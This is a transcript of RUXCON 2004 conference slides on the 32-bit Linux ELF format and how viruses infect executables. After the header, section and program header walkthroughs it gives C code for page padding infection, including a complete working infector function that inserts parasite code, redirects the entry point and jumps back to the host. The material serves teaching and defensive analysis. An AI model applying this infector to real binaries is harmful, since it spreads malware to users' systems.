
RUXCON 2004 ELF: A fairytale for viruses

RUXCON 2004 ELF: A fairytale for viruses. Presented by Daniel Hodson. Preface. PLT Redirection Runtime Injection Phdr hijacking Conclusion Q&A. ELF Format ELF Header Section Header Program Header Page Padding Infection Function Padding Infection. ELF: A fairy tale for viruses.



  1. RUXCON 2004 ELF: A fairytale for viruses Presented by Daniel Hodson

  2. Preface • PLT Redirection • Runtime Injection • Phdr hijacking • Conclusion • Q&A • ELF Format • ELF Header • Section Header • Program Header • Page Padding Infection • Function Padding Infection

  3. ELF: A fairy tale for viruses ELF

  4. ELF Reasons • What is the Executable and Linking Format? • Part of the ABI • Streamline software development • Three main ELF object files. (Relocatable/Executable/Shared) • Two views - Executable/Linking

  5. ELF Reasons [Figure: a C source file passes through compile time and linking (the linking view) to become a loadable image (the execution view).] The example program on the slide:
    #include <stdio.h>
    #include <unistd.h>
    int data;          /* uninitialised: ends up in .bss  */
    int value = 1;     /* initialised: ends up in .data   */
    int main(void)
    {
        data = 2;
        write(value, &data, sizeof data);   /* fd 1 = stdout, buffer pointer, byte count */
        return 0;
    }

  6. ELF Reasons • What area of ELF will we focus on? • Executable object files • The execution view • 32 bit Linux systems

  7. ELF: A fairy tale for viruses ELF Header Elf32_Ehdr

  8. ELF HEADER • What is it? “An ELF header resides at the beginning and holds a ‘road map’ describing the file’s organization.” • Provides information such as offsets to program header and section header tables, sizes and number of entries, along with identification information.

  9. ELF32_Ehdr

  10. ELF Header (Cont.) The first 52 bytes (sizeof(Elf32_Ehdr)) of the sample binary:
    00000000 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 |.ELF............|
    00000010 02 00 03 00 01 00 00 00 78 82 04 08 34 00 00 00 |........x...4...|
    00000020 5c 1d 00 00 00 00 00 00 34 00 20 00 06 00 28 00 |\.......4. ...(.|
    00000030 22 00 1f 00                                     |"...            |
    [Figure: file layout – ELF Header, Program Header, Section 1, Section 2, …, Section[n], Section Header table.]
    e_ident[0-3] – This holds the ELF magic number: 7f, 'E', 'L', 'F'.

  11. ELF Header (Cont.) e_type – This identifies the type of object file. ET_EXEC (2) – executable file. ET_DYN (3) – shared object file. The dump shows 02 00: ET_EXEC.

  12. ELF Header (Cont.) e_machine – Required architecture of the file. EM_386 (3) – Intel architecture. The dump shows 03 00.

  13. ELF Header (Cont.) e_entry (0x08048278) – Virtual address to which the system first transfers control, “starting the process”. In the dump: 78 82 04 08, little-endian.

  14. ELF Header (Cont.) e_phoff (0x34) – This holds the program header table's offset in bytes from the beginning of the file; here the table directly follows the 52-byte ELF header.

  15. ELF Header (Cont.) e_shoff (0x1d5c) – This holds the section header table's offset in bytes from the beginning of the file.

  16. ELF Header (Cont.) e_phentsize (0x20) – This holds the size in bytes of one entry in the program header table, i.e. sizeof(Elf32_Phdr).

  17. ELF Header (Cont.) e_phnum (6) – This holds the number of entries in the program header table.

  18. ELF Header (Cont.) e_shentsize (0x28) – This holds the size in bytes of one entry in the section header table, i.e. sizeof(Elf32_Shdr).

  19. ELF: A fairy tale for viruses Section Header Table Elf32_Shdr

  20. Section Header What is it? • A section header table is used to locate and interpret all of the file's sections. • A section's contents are not self-describing, so the tools that process the file rely on the identifying information in its section header (type, flags, address, offset, size) to interpret them correctly. • The table is an array [e_shnum] of Elf32_Shdr structures, holding information about section sizes, locations, virtual addresses and so on.

  21. Elf32_Shdr

  22. Section Header One section header entry (Elf32_Shdr) of the sample binary, section index 1 at file offset 0x1d84 (e_shoff + 1 × e_shentsize):
    00001d80             1b 00 00 00 01 00 00 00 02 00 00 00 |    ............|
    00001d90 f4 80 04 08 f4 00 00 00 13 00 00 00 00 00 00 00 |................|
    00001da0 00 00 00 00 01 00 00 00                         |........        |
    sh_name (0x1b) – This specifies the name of the section, as an index into the section header string table.

  23. Section Header sh_type – This categorizes the section's contents and semantics. SHT_SYMTAB (2) – symbol table. SHT_STRTAB (3) – string table. SHT_DYNAMIC (6) – used in dynamic linking. The dump shows 1: SHT_PROGBITS, program-defined contents.

  24. Section Header sh_flags – Describes the section's attributes; the values are bits that may be combined. SHF_WRITE (0x1) – writable during process execution. SHF_ALLOC (0x2) – occupies memory during process execution. SHF_EXECINSTR (0x4) – contains executable instructions. The dump shows 2: SHF_ALLOC only.

  25. Section Header sh_addr (0x080480f4) – If the section appears in the process image, this is the address at which its first byte will reside.

  26. Section Header sh_offset (0xf4) – Offset in bytes from the beginning of the file to the first byte in the section.

  27. Section Header sh_size (0x13) – This gives the section's size in bytes.

  28. ELF: A fairy tale for viruses Program Header Table Elf32_Phdr

  29. Program Header What is it? • A program header table describes the segments the system needs to prepare when loading the program for execution. It holds information such as virtual addresses, file and memory sizes, segment attributes and so on. • Program headers are meaningful only for executable and shared object files; relocatable files need none. • The program header table is usually located directly after the ELF header, though the specification does not require this: its position is whatever e_phoff says.

  30. Elf32_Phdr

  31. Program Header One program header entry (Elf32_Phdr) of the sample binary, entry index 2 at file offset 0x74 (e_phoff + 2 × e_phentsize):
    00000070             01 00 00 00 00 00 00 00 00 80 04 08 |    ............|
    00000080 00 80 04 08 34 04 00 00 34 04 00 00 05 00 00 00 |....4...4.......|
    00000090 00 10 00 00                                     |....            |
    p_type – The type of segment the header describes. PT_LOAD (1) – loadable segment, appears in the process image.

  32. Program Header p_offset (0) – Offset in bytes from the beginning of the file at which the first byte of the segment resides; this segment starts at the ELF header itself.

  33. Program Header p_vaddr (0x08048000) – Virtual address at which the first byte of the segment resides in memory.

  34. Program Header p_filesz (0x434) – Number of bytes from the file that appear in the memory image of the segment.

  35. Program Header p_memsz (0x434) – Number of bytes in the memory image of the segment; larger than p_filesz when the segment carries zero-filled data such as .bss.

  36. Program Header p_flags – Permissions the segment will hold in memory. PF_X (1) – executable. PF_W (2) – writable. PF_R (4) – readable. The dump shows 5: PF_R | PF_X, the text segment.

  37. Program Header p_align (0x1000) – This gives the value to which the segment is aligned in memory and in the file: p_vaddr must equal p_offset modulo p_align.
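The three dumps above (slides 10, 22 and 31) decoded with the glibc structures, as an added example that is not part of the slides: check_ehdr() runs the checks a loader or an infector should make before trusting any offset in the header, ehdr_min_file_size() gives the smallest file that can contain both tables the header points at, and the two Elf32_Phdr helpers apply the congruence rule and compute the page padding of the PT_LOAD entry. The byte arrays are transcribed from the slides' hexdumps; the section header dump stops after sh_addralign, so sh_entsize is assumed to be 0. Assumes Linux with <elf.h> and a little-endian host.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Elf32_Ehdr, file offsets 0x00..0x33, transcribed from the slide's hexdump. */
static const uint8_t EHDR_BYTES[52] = {
    0x7f,0x45,0x4c,0x46, 0x01,0x01,0x01,0x00, 0,0,0,0, 0,0,0,0,
    0x02,0x00, 0x03,0x00, 0x01,0,0,0, 0x78,0x82,0x04,0x08,
    0x34,0,0,0, 0x5c,0x1d,0,0, 0,0,0,0, 0x34,0x00, 0x20,0x00,
    0x06,0x00, 0x28,0x00, 0x22,0x00, 0x1f,0x00 };
/* Elf32_Phdr at file offset 0x74 = e_phoff + 2 * e_phentsize (entry 2). */
static const uint8_t PHDR_BYTES[32] = {
    0x01,0,0,0, 0,0,0,0, 0x00,0x80,0x04,0x08, 0x00,0x80,0x04,0x08,
    0x34,0x04,0,0, 0x34,0x04,0,0, 0x05,0,0,0, 0x00,0x10,0,0 };
/* Elf32_Shdr at file offset 0x1d84 = e_shoff + 1 * e_shentsize (entry 1). The
 * slide's dump stops after sh_addralign, so sh_entsize is assumed to be 0. */
static const uint8_t SHDR_BYTES[40] = {
    0x1b,0,0,0, 0x01,0,0,0, 0x02,0,0,0, 0xf4,0x80,0x04,0x08,
    0xf4,0,0,0, 0x13,0,0,0, 0,0,0,0, 0,0,0,0, 0x01,0,0,0, 0,0,0,0 };

/* Raw bytes -> struct. memcpy sidesteps alignment; no byte swapping is needed
 * because the file is ELFDATA2LSB and the host is assumed little-endian. */
Elf32_Ehdr decode_ehdr(const uint8_t *b) { Elf32_Ehdr h; memcpy(&h, b, sizeof h); return h; }
Elf32_Phdr decode_phdr(const uint8_t *b) { Elf32_Phdr p; memcpy(&p, b, sizeof p); return p; }
Elf32_Shdr decode_shdr(const uint8_t *b) { Elf32_Shdr s; memcpy(&s, b, sizeof s); return s; }

/* 0 if this is a 32-bit little-endian x86 executable or shared object whose
 * table entry sizes match our structs; otherwise the number of the failed check. */
int check_ehdr(const uint8_t *buf, size_t len)
{
    if (len < sizeof(Elf32_Ehdr)) return 1;
    Elf32_Ehdr h = decode_ehdr(buf);
    if (memcmp(h.e_ident, ELFMAG, SELFMAG) != 0) return 2;   /* 7f 'E' 'L' 'F' */
    if (h.e_ident[EI_CLASS] != ELFCLASS32) return 3;
    if (h.e_ident[EI_DATA] != ELFDATA2LSB) return 4;
    if (h.e_type != ET_EXEC && h.e_type != ET_DYN) return 5;
    if (h.e_machine != EM_386) return 6;
    if (h.e_phentsize != sizeof(Elf32_Phdr)) return 7;       /* 0x20 */
    if (h.e_shentsize != sizeof(Elf32_Shdr)) return 8;       /* 0x28 */
    if (h.e_shnum != 0 && h.e_shstrndx >= h.e_shnum) return 9;
    return 0;
}

/* Smallest file that can hold both tables the header points at; a shorter
 * file means e_phoff/e_shoff lie. 64-bit arithmetic so a hostile header
 * cannot wrap the sum back inside the file. */
uint64_t ehdr_min_file_size(const uint8_t *buf)
{
    Elf32_Ehdr h = decode_ehdr(buf);
    uint64_t ph_end = (uint64_t)h.e_phoff + (uint64_t)h.e_phnum * h.e_phentsize;
    uint64_t sh_end = (uint64_t)h.e_shoff + (uint64_t)h.e_shnum * h.e_shentsize;
    return ph_end > sh_end ? ph_end : sh_end;
}

/* The spec's rule for loadable segments: p_vaddr and p_offset congruent
 * modulo p_align (0 or 1 means no alignment constraint). */
int phdr_is_congruent(Elf32_Phdr p)
{
    if (p.p_align <= 1) return 1;
    return ((p.p_vaddr - p.p_offset) & (p.p_align - 1)) == 0;
}

/* Bytes between the end of the segment's file image and the next page
 * boundary in memory: the page padding the infection slides use as a host. */
uint32_t page_padding(Elf32_Phdr p)
{
    if (p.p_align <= 1) return 0;
    return p.p_align - ((p.p_vaddr + p.p_filesz) & (p.p_align - 1));
}

int main(void)
{
    Elf32_Ehdr h = decode_ehdr(EHDR_BYTES);
    Elf32_Phdr p = decode_phdr(PHDR_BYTES);
    Elf32_Shdr s = decode_shdr(SHDR_BYTES);
    printf("check=%d entry=0x%08x phoff=0x%x shoff=0x%x phnum=%u shnum=%u min_size=0x%llx\n",
           check_ehdr(EHDR_BYTES, sizeof EHDR_BYTES), h.e_entry, h.e_phoff, h.e_shoff,
           h.e_phnum, h.e_shnum, (unsigned long long)ehdr_min_file_size(EHDR_BYTES));
    printf("PT_LOAD vaddr=0x%08x filesz=0x%x flags=%u congruent=%d padding=0x%x\n",
           p.p_vaddr, p.p_filesz, p.p_flags, phdr_is_congruent(p), page_padding(p));
    printf("shdr type=%u flags=0x%x addr=0x%08x offset=0x%x size=0x%x\n",
           s.sh_type, s.sh_flags, s.sh_addr, s.sh_offset, s.sh_size);
    return 0;
}
```

Two things the dumps alone do not make obvious: the program header table ends at 0x34 + 6 × 0x20 = 0xf4, exactly where section 1 (19 bytes at 0xf4, the size of "/lib/ld-linux.so.2" plus its terminator) begins, and the text segment's 0x434 bytes leave 0x1000 - 0x434 = 0xbcc bytes of page padding before the next page boundary, which is the room the following slides exploit.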

  38. ELF: A fairy tale for viruses Infection Techniques Page Padding

  39. Page Padding Infection • What is page padding? • Loadable segments are mapped in whole pages, so each segment is page-aligned in memory: the program header records the constraint in its p_align member, and p_vaddr and p_offset must be congruent modulo the page size. • The unused space between the end of a segment and the next page boundary is the page padding. • What is page padding infection? • The insertion of parasite code between two segments, using that page padding as its host.

  40. Page Padding Infection [Figure: executable image. Text segment from 0x2000 to 0x2C00; padding from 0x2C00 up to the next page boundary at 0x3000 (1024 bytes); data segment from 0x3000 to 0x4000.]

  41. Page Padding Infection Infection between segments. [Figure: the same image with the parasite occupying the padding from 0x2C00 to 0x3000.] The text segment is executable, so its padding can host the parasite; the binary is not yet stripped, so its section headers can be updated to cover the parasite's code.

  42. Page Padding Infection To ensure the padding is large enough to host the parasite, a check is usually done like the following. The masked sum must be parenthesised: in C, & binds more loosely than + and -, so without the parentheses the expression yields the used part of the page instead of the free part.
    /* Bytes from the end of the text segment to the next page boundary */
    padding = prog_head->p_align -
              ((prog_head->p_vaddr + prog_head->p_filesz) & (prog_head->p_align - 1));
    if (padding < sizeof(Parasite)) {
        fprintf(stderr, "Error: Padding cannot host parasite.\n");
        cleanup(binary, rd_wr);
        return -1;
    }

  43. Page Padding Infection • The virus needs to increase the file and memory size of the text segment so the parasite is loaded into the process image, and to move the file offset of every following segment forward by one page (4096 bytes): a whole page is inserted into the file, so p_offset stays congruent with p_vaddr modulo p_align for the segments that follow.
    // Search for the text segment and update the rest
    for (loop = 0; loop < elf_head->e_phnum; loop++) {
        if (flag)
            prog_head->p_offset += 4096;          /* every segment after the text segment */
        else if (prog_head->p_type == PT_LOAD && !prog_head->p_offset) {
            flag = 1;
            entry_addr = prog_head->p_vaddr + prog_head->p_filesz;   /* parasite's address */
            offset = prog_head->p_offset + prog_head->p_filesz;      /* its file offset    */
            prog_head->p_filesz += sizeof(Parasite);
            prog_head->p_memsz += sizeof(Parasite);
        }
        prog_head++;
    }

  44. Page Padding Infection • The virus code associates itself with a section to be “strip safe” – the section used should be the last section in the infected segment, i.e. the one that ends exactly at entry_addr. All sections stored at or after the insertion point then have their file offsets moved by the inserted page.
    // Strip safe (associate with a section) and update the rest
    for (loop = 0; loop < elf_head->e_shnum; loop++) {
        if (sec_head->sh_offset >= offset)
            sec_head->sh_offset += 4096;
        else if (sec_head->sh_addr + sec_head->sh_size == entry_addr)
            sec_head->sh_size += sizeof(Parasite);
        sec_head++;
    }

  45. Page Padding Infection • Finally the virus moves the section header table if it lies after the insertion point, changes the entry point of the binary to the parasite, and patches the parasite's last four bytes with the original entry point so it can jump back to the host.
    // Update information
    if (elf_head->e_shoff >= offset)
        elf_head->e_shoff += 4096;
    orig_entry = elf_head->e_entry;
    elf_head->e_entry = entry_addr;
    /* Store the original entry point in the parasite's trailing 4-byte slot */
    memcpy(&Parasite[sizeof(Parasite) - 4], &orig_entry, 4);
    [write...]
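The procedure of slides 42 to 45 carried out end to end on an in-memory image, as an added example that is not the slides' code: page_pad_infect() does the padding check, the page splice and the program header, section header and entry point updates in one pass, and build_sample_image() constructs a small, headers-only 32-bit executable with the slides' layout to run it on. Two deliberate differences from the slides: following segments and sections are shifted when their file offset is at or past the insertion point rather than by table order, and the parasite is a constructed 13-byte trampoline that only jumps back to the original entry point through its trailing slot (it is never executed here). Assumes Linux <elf.h>, a 4096-byte page and a little-endian host.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PAGE 4096u

/* Constructed 13-byte parasite: call/pop to find its own address, then jmp dword [ebx+4]
 * through the trailing 4-byte slot the infector fills with the original entry point. */
static const uint8_t PARASITE[13] = { 0xe8,0,0,0,0, 0x5b, 0xff,0x63,0x04, 0,0,0,0 };

static uint32_t u32_at(const uint8_t *b, size_t off) { uint32_t v; memcpy(&v, b + off, 4); return v; }

/* Writes the infected image to out and returns its length; 0 = unsupported input or no room. */
size_t page_pad_infect(const uint8_t *in, size_t in_len, const uint8_t *para,
                       size_t psz, uint8_t *out, size_t out_cap)
{
    Elf32_Ehdr eh; Elf32_Phdr ph; Elf32_Shdr sh;
    if (in_len < sizeof eh || out_cap < in_len + PAGE || psz < 4) return 0;
    memcpy(&eh, in, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) || eh.e_ident[EI_CLASS] != ELFCLASS32 ||
        eh.e_phentsize != sizeof ph || eh.e_shentsize != sizeof sh) return 0;
    if ((uint64_t)eh.e_phoff + (uint64_t)eh.e_phnum * sizeof ph > in_len ||
        (uint64_t)eh.e_shoff + (uint64_t)eh.e_shnum * sizeof sh > in_len) return 0;
    /* 1. Text segment = first PT_LOAD at file offset 0; the parasite must fit in the bytes
     *    between its end and the next page boundary (mask parenthesised, unlike the slide). */
    int text = -1;
    for (int i = 0; i < eh.e_phnum && text < 0; i++) {
        memcpy(&ph, in + eh.e_phoff + i * sizeof ph, sizeof ph);
        if (ph.p_type == PT_LOAD && ph.p_offset == 0) text = i;
    }
    if (text < 0 || ph.p_align != PAGE) return 0;
    if (psz > ph.p_align - ((ph.p_vaddr + ph.p_filesz) & (ph.p_align - 1))) return 0;
    size_t   insert = ph.p_offset + ph.p_filesz;   /* file offset of the parasite */
    uint32_t entry  = ph.p_vaddr  + ph.p_filesz;   /* its virtual address         */
    /* 2. Splice a whole page in after the text segment's file image: every later offset
     *    moves by p_align, so p_offset stays congruent with p_vaddr for the segments below. */
    memcpy(out, in, insert); memset(out + insert, 0, PAGE); memcpy(out + insert, para, psz);
    memcpy(out + insert + PAGE, in + insert, in_len - insert);
    /* 3. Grow the text segment; shift every segment stored at or after the splice. */
    if (eh.e_phoff >= insert) eh.e_phoff += PAGE;
    for (int i = 0; i < eh.e_phnum; i++) {
        uint8_t *p = out + eh.e_phoff + i * sizeof ph;
        memcpy(&ph, p, sizeof ph);
        if (i == text) { ph.p_filesz += psz; ph.p_memsz += psz; }
        else if (ph.p_offset >= insert) ph.p_offset += PAGE;
        memcpy(p, &ph, sizeof ph);
    }
    /* 4. Same for the section headers; the section that ends exactly at the injection
     *    address absorbs the parasite so strip(1) keeps it. */
    if (eh.e_shoff >= insert) eh.e_shoff += PAGE;
    for (int i = 0; i < eh.e_shnum; i++) {
        uint8_t *p = out + eh.e_shoff + i * sizeof sh;
        memcpy(&sh, p, sizeof sh);
        if (sh.sh_offset >= insert) sh.sh_offset += PAGE;
        else if (sh.sh_addr + sh.sh_size == entry) sh.sh_size += psz;
        memcpy(p, &sh, sizeof sh);
    }
    /* 5. New entry point; the original goes into the parasite's last 4 bytes (host is LE). */
    memcpy(out + insert + psz - 4, &eh.e_entry, 4);
    eh.e_entry = entry; memcpy(out, &eh, sizeof eh);
    return in_len + PAGE;
}

/* Constructed sample: headers only, laid out like the slides' binary (text at 0x08048000 with
 * p_filesz 0x434, data at file offset 0x434, section headers at 0x440); .data holds 0xaa bytes. */
size_t build_sample_image(uint8_t *buf, size_t cap)
{
    Elf32_Ehdr eh = { .e_ident = { 0x7f, 'E', 'L', 'F', ELFCLASS32, ELFDATA2LSB, EV_CURRENT },
        .e_type = ET_EXEC, .e_machine = EM_386, .e_version = EV_CURRENT, .e_entry = 0x08048278,
        .e_phoff = sizeof(Elf32_Ehdr), .e_shoff = 0x440, .e_ehsize = sizeof(Elf32_Ehdr),
        .e_phentsize = sizeof(Elf32_Phdr), .e_phnum = 2, .e_shentsize = sizeof(Elf32_Shdr), .e_shnum = 3 };
    Elf32_Phdr ph[2] = {
        { PT_LOAD, 0,     0x08048000, 0x08048000, 0x434, 0x434, PF_R | PF_X, PAGE },
        { PT_LOAD, 0x434, 0x08049434, 0x08049434, 0x0c,  0x20,  PF_R | PF_W, PAGE } };
    Elf32_Shdr sh[3] = { { 0 },
        { .sh_type = SHT_PROGBITS, .sh_flags = SHF_ALLOC | SHF_EXECINSTR, .sh_addr = 0x08048278, .sh_offset = 0x278, .sh_size = 0x1bc },
        { .sh_type = SHT_PROGBITS, .sh_flags = SHF_ALLOC | SHF_WRITE,     .sh_addr = 0x08049434, .sh_offset = 0x434, .sh_size = 0x0c } };
    size_t len = 0x440 + sizeof sh;
    if (cap < len) return 0;
    memset(buf, 0, len);
    memcpy(buf, &eh, sizeof eh); memcpy(buf + sizeof eh, ph, sizeof ph);
    memcpy(buf + 0x440, sh, sizeof sh); memset(buf + 0x434, 0xaa, 0x0c);
    return len;
}

static uint8_t g_in[0x1000], g_out[0x2000];

/* Infects the sample with the first psz bytes of a zero-padded copy of PARASITE, leaving the
 * result in g_out; returns the new length, or 0 when the infector refuses. */
size_t run_sample(size_t psz)
{
    static uint8_t para[PAGE];
    memcpy(para, PARASITE, sizeof PARASITE);
    size_t n = build_sample_image(g_in, sizeof g_in);
    return n && psz <= sizeof para ? page_pad_infect(g_in, n, para, psz, g_out, sizeof g_out) : 0;
}

int main(void)
{
    size_t n = run_sample(sizeof PARASITE);
    printf("%zu bytes, e_entry 0x%08x, e_shoff 0x%x, saved entry 0x%08x\n", n,
           u32_at(g_out, 24), u32_at(g_out, 32), u32_at(g_out, 0x434 + sizeof PARASITE - 4));
    printf("0xbcd-byte parasite (padding is 0xbcc): %zu\n", run_sample(0xbcd));
    return n ? 0 : 1;
}
```

On the sample the file grows by exactly one page (0x4b8 to 0x14b8 bytes), e_entry moves to 0x08048434, and e_shoff, the data segment's p_offset and the .data section's sh_offset all move by 0x1000 while the text segment and the .text section each grow by the 13 parasite bytes; a parasite one byte larger than the 0xbcc bytes of padding is refused. On a real file the same function applies after the whole file has been read into memory.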

  46. Page Padding Infection

  47. ELF: A fairy tale for viruses Infection Techniques Static binary infection

  48. Static binary infection • Static infection removes the need to cluster the viral code into one block of memory (a page) and avoids the heavy manipulation of sections and offsets that page padding infection requires. • With function padding infection it is possible to leave the file size unchanged.

  49. ELF: A fairy tale for viruses Infection Techniques PLT Redirection

  50. PLT Redirection • Taken from the ELF specifications – “The procedure linkage table redirects position independent function calls to absolute locations. The link editor cannot resolve execution transfers (such as function calls) from one executable or shared object to another. Consequently, the link editor arranges to have the program transfer control to entries in the procedure linkage table.”
